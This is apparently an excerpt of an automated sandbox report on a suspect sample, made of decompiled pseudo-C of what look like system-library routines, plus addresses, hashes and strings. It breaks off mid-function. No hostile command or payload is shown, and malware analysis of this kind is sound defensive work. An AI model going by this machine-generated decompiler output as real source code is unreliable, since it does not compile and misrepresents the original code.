0x0388e7b2
0x0388e7b9
0x0388e7b9
0x0388e7c7
0x0388e806
0x00000000
0x0388e7c9
0x0388e7d1
0x0388e7d8
0x00000000
0x0388e7d8
0x00000000
0x00000000
0x0388e722
0x0388e72e
0x0388e748
0x0388e74c
0x0388e754
0x0388e756
0x0388e75c
0x0388e75c
0x00000000
0x0388e75c
0x0388e758
0x0388e758
0x00000000
0x0388e758
0x0388e750
0x00000000
0x00000000
0x0388e752
0x00000000
0x0388e752
0x0388e730
0x0388e735
0x0388e73d
0x0388e73f
0x00000000
0x00000000
0x0388e741
0x0388e741
0x00000000
0x0388e741
0x0388e739
0x00000000
0x00000000
0x0388e73b
0x00000000
0x0388e73b
0x0388e722
0x0388e720
0x0388e6b0
0x0388e618
0x00000000
0x0388e618

Strings

`, xrefs: 0388E670
`, xrefs: 0388E5D7

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 7abd92f8c87f57e852bef1f8ce9f4e134b5f8dd1a52d49bf77f082c88b41608f
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: FD919E352043469FE724EFA9C841B1BB7E5BF84714F1889ADF5A5CB280E774E804CB52

Uniqueness

Uniqueness Score: -1.00%

Function 038451BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E038451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x38a05f0);
				E0381D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E037DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E038453CA(0);
						return E0381D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0380F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E037E3690(1, _t117, 0x37a1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0380AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L037E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0380AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0384500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03809860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x038451be
0x038451c3
0x038451c8
0x038451cd
0x038451d0
0x038451d3
0x038451d8
0x038451db
0x038451de
0x038451e0
0x038451e3
0x038451e6
0x038451e8
0x03845342
0x03845351
0x03845356
0x0384535a
0x03845360
0x03845363
0x03845366
0x03845369
0x03845369
0x0384536b
0x0384536b
0x03845370
0x038453a3
0x038453a4
0x038453a6
0x038453ab
0x038453ab
0x038453ae
0x038453ae
0x038453b5
0x038453bf
0x038453bf
0x03845375
0x03845396
0x038453a0
0x038453a0
0x00000000
0x03845396
0x03845377
0x03845379
0x0384537f
0x0384538c
0x03845390
0x00000000
0x03845390
0x038451ee
0x038451f1
0x03845301
0x03845310
0x03845315
0x03845318
0x0384531b
0x03845320
0x0384532e
0x03845331
0x00000000
0x03845331
0x03845328
0x03845329
0x00000000
0x03845329
0x038451fa
0x03845235
0x03845236
0x03845239
0x0384523f
0x03845240
0x03845241
0x03845242
0x03845246
0x03845247
0x0384524e
0x03845251
0x03845267
0x03845269
0x0384526e
0x0384527d
0x0384527e
0x03845281
0x03845282
0x03845287
0x03845288
0x0384528a
0x0384528f
0x03845294
0x00000000
0x00000000
0x0384529a
0x0384529c
0x0384529e
0x0384529e
0x038452a4
0x038452b0
0x00000000
0x00000000
0x038452ba
0x038452bc
0x038452bc
0x038452d4
0x038452d9
0x038452dc
0x038452e1
0x00000000
0x00000000
0x038452e7
0x038452f4
0x00000000
0x038452f4
0x03845270
0x00000000
0x03845270
0x038451fc
0x038451fd
0x03845202
0x03845203
0x03845205
0x0384520a
0x0384520f
0x00000000
0x00000000
0x0384521b
0x03845226
0x0384522b
0x0384521d
0x0384521d
0x03845222
0x03845222
0x0384522d
0x00000000

Strings

Legacy, xrefs: 03845226
UEFI, xrefs: 0384521D

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: c029a60bd51a2cfd3690095db8d20dedb505f92acdc137fbf08102fda38b4703
Instruction ID: 2c749176c01b441b69591111c452e37542fae377f905eed7af2761d2d6417d55
Opcode Fuzzy Hash: c029a60bd51a2cfd3690095db8d20dedb505f92acdc137fbf08102fda38b4703
Instruction Fuzzy Hash: DB515EB1A0071D9FDB25DFE88840BADB7F8BB8A704F1440ADE559EB691E6719900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 037CB171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E037CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x389f7a8);
				E0381D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0381D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0380D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0380F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0381DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0380B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0380B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0380E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0380A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x037cb171
0x037cb171
0x037cb171
0x037cb171
0x037cb171
0x037cb176
0x037cb17b
0x037cb180
0x037cb186
0x037cb18f
0x037cb198
0x037cb1a4
0x037cb1aa
0x03824802
0x03824802
0x03824805
0x0382480c
0x0382480e
0x037cb1d1
0x037cb1d3
0x037cb1de
0x037cb1de
0x03824817
0x0382481e
0x03824820
0x03824822
0x03824822
0x03824824
0x03824824
0x0382482a
0x00000000
0x00000000
0x03824835
0x0382483a
0x0382483d
0x0382483f
0x03824842
0x03824842
0x03824842
0x03824846
0x0382484c
0x0382484e
0x03824851
0x03824851
0x03824853
0x03824854
0x03824854
0x03824858
0x0382485a
0x0382485a
0x0382485d
0x0382485f
0x03824861
0x03824861
0x03824866
0x0382486b
0x0382486e
0x03824871
0x03824876
0x03824876
0x03824878
0x0382487b
0x03824884
0x03824884
0x00000000
0x0382487d
0x0382487d
0x03824882
0x03824889
0x03824889
0x0382488f
0x03824891
0x038248e0
0x038248e2
0x038248e4
0x038248e4
0x038248e7
0x038248e7
0x038248ed
0x038248f4
0x038248f6
0x03824951
0x03824951
0x03824953
0x03824953
0x03824956
0x03824956
0x03824958
0x03824959
0x03824959
0x0382495d
0x0382495d
0x0382495f
0x0382495f
0x03824965
0x03824969
0x038249ba
0x038249ba
0x038249c1
0x038249c5
0x038249cc
0x038249d4
0x038249d7
0x038249da
0x038249e4
0x038249e5
0x038249f3
0x03824a02
0x00000000
0x03824a02
0x03824972
0x03824974
0x00000000
0x00000000
0x03824976
0x03824979
0x03824982
0x03824983
0x03824984
0x0382498b
0x0382498d
0x03824991
0x03824993
0x03824999
0x0382499d
0x038249a2
0x038249a2
0x038249a2
0x03824999
0x038249ac
0x00000000
0x038249b3
0x038248f8
0x038248fe
0x00000000
0x00000000
0x00000000
0x038248fe
0x03824895
0x0382489c
0x038248ad
0x038248b2
0x038248b5
0x038248b7
0x038248ba
0x038248bc
0x038248c6
0x038248c6
0x038248cb
0x038248d1
0x038248d4
0x038248d8
0x038248d8
0x00000000
0x038248d8
0x038248be
0x038248c0
0x00000000
0x00000000
0x038248c2
0x00000000
0x00000000
0x00000000
0x038248c4
0x00000000
0x03824882
0x0382487b
0x03824904
0x03824906
0x00000000
0x00000000
0x03824908
0x0382490e
0x00000000
0x00000000
0x03824910
0x03824917
0x03824917
0x00000000
0x03824917
0x037cb1ba
0x038247f9
0x038247fc
0x00000000
0x00000000
0x00000000
0x038247fc
0x037cb1c0
0x037cb1c0
0x037cb1c3
0x037cb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 038248AD

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: a0a3a4741548b83246d7ecc30814061b8855bb6ec59574b7abae792bc25945a3
Instruction ID: 1bda1647696a4b3ecff201a44d3ab069024742f7b44e7c0d074a5a6a62bb8fcb
Opcode Fuzzy Hash: a0a3a4741548b83246d7ecc30814061b8855bb6ec59574b7abae792bc25945a3
Instruction Fuzzy Hash: 6351EF75D142A98ADB31CFAA8840BBEBFB4AF00710F1441EDEC59EB291C37049858BA1

Uniqueness

Uniqueness Score: -1.00%

Function 037EB944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E037EB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x38bd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E037E7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E03898CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03809E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0380B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0380CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E037E7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E03898F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0380AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x38b8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x38b862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x38b8628; // 0x0
							_t116 =  *0x38b862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x037eb94c
0x037eb956
0x037eb95c
0x037eb95e
0x037eb964
0x037eb969
0x037eb96d
0x037eb96d
0x037eb970
0x037eb974
0x037eb97a
0x037ebadf
0x037ebadf
0x037ebae2
0x037ebae4
0x037ebae6
0x037ebaf0
0x03832cb8
0x037ebaf6
0x037ebaf6
0x037ebaf6
0x037ebafd
0x037ebb1f
0x037ebb1f
0x037ebaff
0x037ebb00
0x037ebb00
0x037ebb03
0x037ebb03
0x037ebacb
0x037ebacf
0x037ebad0
0x037ebad1
0x037ebadc
0x037ebadc
0x037eb980
0x037eb980
0x037eb988
0x037eb98b
0x037eb98d
0x037eb990
0x037eb993
0x037eb999
0x037eb99b
0x037eb9a1
0x037eb9a5
0x037eb9aa
0x037eb9b0
0x037eb9bb
0x037eb9c0
0x037eb9c3
0x037eb9ca
0x037eb9cc
0x037eb9cf
0x037eb9d3
0x037eb9d7
0x037eba94
0x037eba94
0x037eba98
0x037ebaa3
0x03832ccb
0x037ebaa9
0x037ebaa9
0x037ebaa9
0x037ebab1
0x03832cd5
0x03832cdd
0x03832cdd
0x037ebabb
0x037ebabc
0x037ebac2
0x037ebac3
0x037ebac3
0x037ebac6
0x00000000
0x037eb9dd
0x037eb9dd
0x037eb9e7
0x037eb9e7
0x037eb9ec
0x037eb9ec
0x037eb9f1
0x037eb9f5
0x037eb9fa
0x037eba00
0x037eba0c
0x037eba10
0x037eba10
0x037eba12
0x037eba18
0x00000000
0x00000000
0x037ebb26
0x037ebb26
0x037eba1e
0x037eba1e
0x037eba23
0x037eba25
0x037eba2c
0x037eba30
0x037eba35
0x037eba35
0x037eba41
0x037eba46
0x037eba4c
0x037eba50
0x037eba54
0x037eba6a
0x037eba6e
0x037eba70
0x037eba74
0x037eba78
0x037eba7a
0x037eba7c
0x037eba8e
0x037eba90
0x037eba92
0x037ebb14
0x037ebb14
0x037ebb16
0x037ebb16
0x00000000
0x037eba7c
0x037ebb0a
0x037ebb0d
0x00000000
0x00000000
0x00000000
0x037ebb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037EB9A5

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: c2d0e070020fbe03edbf6631f913efb7cc25e613fff4aeaf217ebdd6f57703e5
Instruction ID: 7f89ed7b44d3a33bf285ee4f8d780424e371a7a3ca53f6faf282b5cf21026a8d
Opcode Fuzzy Hash: c2d0e070020fbe03edbf6631f913efb7cc25e613fff4aeaf217ebdd6f57703e5
Instruction Fuzzy Hash: 3A514871A08745CFCB20DF69C4C092AFFE9FB88610F1849AEE5959B354E771E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 037F2581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E037F2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a1546912635) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				void* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t237;
				signed int _t241;
				signed int _t272;
				signed int _t278;
				signed int _t280;
				unsigned int _t287;
				signed int _t291;
				void* _t292;
				signed int _t319;
				signed int _t321;
				signed int _t326;
				signed int _t327;
				signed int _t333;
				signed int _t336;
				void* _t337;
				signed int _t339;
				void* _t340;

				_t333 = _t336;
				_t337 = _t336 - 0x4c;
				_v8 =  *0x38bd360 ^ _t333;
				_t326 = 0x38bb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t287 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t340 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t278 = 0x48;
				_t308 = 0 | _t340 == 0x00000000;
				_t319 = 0;
				_v37 = _t340 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t278 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t327 = 0xc0000106;
						goto L32;
					} else {
